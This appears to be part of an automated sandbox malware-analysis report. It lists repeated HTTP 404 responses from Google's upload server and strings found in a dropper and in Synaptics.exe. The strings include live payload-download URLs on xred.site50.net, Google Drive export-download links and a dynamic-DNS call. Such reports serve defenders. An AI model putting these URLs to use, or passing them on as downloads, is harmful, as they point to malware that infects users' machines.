                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_LzXVOPHk1zy02ujums4x9ocqNfziH5KRqyHhfc-E82tlFT6RoJQ6MthNPi-X19VVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-33GJqMlK8Jsh_0Pp8Arv6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5sGdVSkZMHNf8RKW2yNZtrtIcJCFmJ6NJZBpy6HPbStB5eXRKI0AthS24HA6soaUv_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:36 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-zoIHPCHMHKSeV-G3pnaCvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SRYTN8JCguFe6pxvW1q4j_sxTbwuWY-PyogfFpjcEVAbfpPY12e1do2gxs8IGDcs39KevjykContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LZr15ntIk5bahUJ8WV0OpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Ue6LrGCymefIM-wbLv0yeXqHbDzzCCABWpzeN9oUSFgVTpklSoq1MqVzdWTl3MRxfGEoHal8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-BTlHEkSFFbaUvAwNzkrKwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4xjACCzHWQkpTnzF4IdBeJWsbwQ8Wt4lz6MUoOTPLpvjzfwRJ9EWn_41ql3JpGIsvDEYJk17AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-E2vbfZLdLrHL0K0ASADqig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5MBK4o0TL8mdsA9J_jz_jBMxJf5q5LcYOKlflX-LyYD2qvXCQEKPOnO5abtACBsHcDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:38 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MW0amh_X7GCwXdQ2VnB8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gV8BCzfGuYQhN2yQ05qyRfLlKtyL6XvkoLqYy93hb7MqCKY0TvNVdZgM37-M3sCTFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:39 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hIn7nv2L5sbpFkff6ZyNjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC58Y-WbYDfyGcg6wNq57iZrlxztHUeya1O6ZVbIzyhqI7l-uSMtHQVLwmgRjhfZ8QPdB0YN0GEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:40 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-BgGfeNyE0wB1fa_h8G_ofw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59nJl1KRdaMi3b3O_E3ZsO6sRFUeM3hddZ0F46xi9LxbMV5wgJknNsLObLVMk51xAQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Yq12V9ypN3Q7d5XeW16JRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7H5jGutOktHQL-51asoFmk3Dwzs3TkdD0XYZuaA9Wm-FHmjpRaRWMym0CUKHi8Gd4RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:41 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-zpFUKac8DfKWTZbNXvnsAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7eZY5umXs1nM3GPXuVab-m0HSMYihxJVcFXhlRcztjSRDK6xK6i60iBio9CoXvly7fz8dlIHEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-e50PC8pBzN40j-9n-PgyCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5HZPBfwWfJ54z6GnsFPZ38A-gGc6uoj3I-wV904YsrG3nJmCeWdLBgUoL6DQ6t5vlGf17lcMIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:50 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-v_G_P6LB-MOKZBKjJ2BQ3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: 674551.msi.1.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978h
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                              Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                              Source: 674551.msi.1.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: 674551.msi.1.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: 674551.msi.1.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2408827318.000000000EF1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/.googl.
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/.youtubeeducatiZ
                              Source: Synaptics.exe, 00000004.00000003.2154958231.0000000005318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/M
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Microsoft
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/R
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/apps.cn
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/bleclick.cn
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/e?M
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/imiz
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/project.org.cn
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EF1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/r
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/syndication-cn.com
                              Source: Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ube.com
                              Source: Synaptics.exe, 00000004.00000002.2412059221.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2409682805.00000000100EE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: 674551.msi.1.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000004.00000002.2395642291.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: Synaptics.exe, 00000004.00000002.2396842669.0000000005318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEV
                              Source: Synaptics.exe, 00000004.00000002.2403570018.000000000AA5E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&
                              Source: MSI4755.tmp, 00000003.00000003.2049403724.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2406176432.000000000D61E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2401978923.000000000889E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396245918.000000000486E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2404618386.000000000BE5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2402460770.000000000929E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398733458.000000000701E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2402568669.000000000951E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2410054312.000000001086E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2397903311.0000000005D8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2404000242.000000000B1DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2406803814.000000000E16E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398633419.0000000006D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2406666698.000000000E01E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398845599.000000000729E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2409450576.000000000FBEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2412366894.000000001327E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2398682291.0000000006EDE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2409998792.000000001072E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396316708.00000000049AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2410669204.0000000010EAE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#a
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#c
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$BC
                              Source: Synaptics.exe, 00000004.00000002.2399690937.000000000764F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$_L
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$a
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000076E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$aU
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$u
                              Source: Synaptics.exe, 00000004.00000002.2398988499.0000000007588000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2396842669.00000000052CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%c
                              Source: Synaptics.exe, 00000004.00000002.2408827318.000000000EEEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%e
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.00000000075E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2399690937.000000000769D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.2154822323.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&-
